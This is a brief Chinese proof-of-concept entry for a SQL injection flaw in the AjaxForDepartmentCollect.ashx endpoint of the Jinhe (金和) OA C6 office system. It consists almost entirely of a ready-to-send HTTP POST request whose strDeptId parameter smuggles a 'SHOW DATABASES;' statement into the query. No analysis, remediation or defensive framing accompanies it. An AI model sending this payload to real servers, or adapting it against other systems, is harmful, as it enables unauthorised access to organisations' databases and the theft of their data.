金和OA C6系统 AjaxForDepartmentCollect.ashx SQL注入漏洞
PoC代码
POST /c6/JHSoft.Web.CostControl/Collect/AjaxForDepartmentCollect.ashx HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 89
Connection: keep-alive
Accept-Encoding: gzip, deflate, br
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
strType=getHistoryList&strDeptId=SHOW+DATABASES%3b&strCollectType=Department&strYear=2012